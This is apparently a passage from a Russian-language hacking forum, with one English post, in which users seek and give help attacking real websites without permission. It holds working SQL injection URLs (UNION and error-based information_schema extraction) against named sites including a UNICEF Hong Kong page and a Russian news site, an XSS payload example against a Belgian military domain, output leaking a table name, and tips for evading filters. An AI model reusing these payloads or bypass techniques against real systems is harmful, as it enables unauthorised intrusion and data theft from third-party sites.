Помогите! Товарищи! Откровенно говоря задолбался Начал тут познавать прелести xss. Просканил сайт одного провайдера, нашел вот что: PHP: " onmouseover=prompt(903167) bad=" типо это xss, уязвимый параметр. сканил WVS, с английским проблем особо нет, но тут я затупил. мануалов не нашел, гугл мне не помог. прошу вас мне пояснить как это использовать, и желательно не выходя из программы^^ PS: Знания веб хакинга есть, говорю ж осталось xss доучить PSS единственное что нашел, как пример: PHP: http://www.acunetix.com/blog/web-security-zone/articles/web-vulnerabilities-pligg/
что-то похожее, но не в моем случае. видел примеры таких xss типа такого запроса PHP: http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1 про кавычки все правильно сказано, а про остальное соотнести не могу а еще... может verb tampering проще? кто нибудь встречался?
Ребята, есть программа, с интерфейсом (понятно для новичнов) для того, чтоб проверил какие директории и файлы доступны для чтения ? т.е. вбиваешь WEB адрес и он сканирует сайт и выдает отчет по файлам и папкам. т.п. программы, как Acunetix Web Vulnerability Scanner не советовать, хочется менького и без лишних гемор.
Verb Tampering? Забудь, сейчас таких уязвимостей мало(появился один с php, суть в том. что при передаче HEAD-ом php-скрипт выполнится до первого вывода инфы, что открывается баги). Твой WVS не сможет найти скульи без error-а, лучше всего с помощью WVS найти все скрипты, а шаманить уже самому. Насчет mil.be, у меня при твоем запросе перенаправляет. Чтобы отключить перенаправление, нужно отключить Javascript(XSS работать не будет), или отключить autoredirect(которое включено по умолчанию на всех браузерах). 2B1t.exe, информация об доступности на запись хранится на сервере, ты просто не сможешь этого сделать. 2Lilo,
Как вариант, пробуй: infOrmAtion_schEma./**/tabLeS P.S. Обход точки невозможен. Придется угадать таблицы.
I got the "order by" here. Code: https://www.unicef.org.hk/news/list_detail.php?id=234+order+by+17--+- Now "union select" does not work. Code: https://www.unicef.org.hk/news/list_detail.php?id=234+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+- Code: https://www.unicef.org.hk/news/list_detail.php?id=234%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28selectconcat%280x7e,0x27,cast%28version%28%29%20as%20char%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20frominformation_schema.tables%20group%20by%20x%29a%29%20and%201=1+--+ Where is my fault now?
что то не могу дальше вывести Code: http://www.lenta.cjes.ru/ ?nid=1089' and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x
2Faaax, Code: http://www.lenta.cjes.ru/?m=1&y=2012&lang=rus&nid=1089'+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f Результат: Code: Duplicate entry '[COLOR=Red]COLLATIONS[/COLOR]' for key 1
Проблема с XSS. Пока что не хочу давать линк... проблема в том, что я хочу, чтоб при вводе в поиск вылетел алерт. Что я только не пробовал, но результат один и тот же: ввожу <script>alert()</script>, нажимаю Ентер, в поиске остается <sc. Ввожу "><script>alert()</script> - вывод "><sc и т .д. Фильтр обрезает все, что после SC. Какие есть еще варианты?
Не думаю. Так как в твоем случаи: Code: +and+1=1 true +and+1=0 true Да и ничего не меняется при вставке кавычки.
jecka3000, вариантов очень много. Для начала надо определить, какие теги пропускает фильтр и в зависимости от этого использовать события. Все зависит от конкретного сайта. Скинь ссылку в личку, если не хочешь выкладывать в теме.